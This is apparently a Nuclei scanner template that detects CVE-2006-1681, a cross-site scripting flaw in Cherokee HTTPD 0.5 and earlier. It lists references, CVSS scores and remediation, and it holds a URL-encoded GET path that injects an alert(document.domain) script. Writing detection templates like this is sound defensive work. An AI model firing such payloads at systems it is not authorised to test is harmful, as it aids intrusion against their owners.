id: CVE-2006-1681 info: name: Cherokee HTTPD <=0.5 - Cross-Site Scripting author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. remediation: | Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: - http://www.vupen.com/english/advisories/2006/1292 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698 - https://security.gentoo.org/glsa/202012-09 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 epss-percentile: 0.82038 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cherokee product: cherokee_httpd tags: cherokee,httpd,xss,cve,cve2006 http: - method: GET path: - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a0048304602210093b2414af7a1eff4dc317fc3f53965a86db6dfc1a23701c8a7199f455d275fe6022100f5821144b4120a24e2cf10f5a294ae943b2c953a5a93dc0f40d27b19507a21e0:922c64590222798bb761d5b6d8e72950